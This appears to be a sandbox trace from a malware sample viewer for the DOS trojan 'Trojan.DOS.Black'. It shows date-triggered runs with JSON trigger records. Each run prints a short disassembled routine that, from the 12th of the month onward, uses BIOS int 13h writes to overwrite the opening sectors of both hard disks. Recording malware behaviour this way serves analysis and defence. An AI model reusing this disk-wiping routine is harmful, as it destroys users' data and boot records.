Sample viewer

vx.netlux.org/Trojan.DOS.Black


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:58:26.87849049Z 42 PC: 12a44 | Get date
0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":934,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:06.700804958Z 42 PC: 12a44 | Get date
0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti

{"DateBased":true,"Day":12,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":934,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:06.710330194Z 42 PC: 12a44 | Get date
0x12a44: cmp dl, 0xc
0x12a47: jb 0x12a77
0x12a49: cli
0x12a4a: mov ah, 3
0x12a4c: mov al, 0x7d
0x12a4e: mov ch, 0
0x12a50: mov cl, 1
0x12a52: mov dh, 0
0x12a54: mov dl, 0x80
0x12a56: mov bx, 0x28
0x12a59: int 0x13
0x12a5b: mov ah, 3
0x12a5d: mov al, 0x7d
0x12a5f: mov ch, 0
0x12a61: mov cl, 1
0x12a63: mov dh, 0
0x12a65: mov dl, 0x81
0x12a67: mov bx, 0x28
0x12a6a: int 0x13
0x12a6c: sti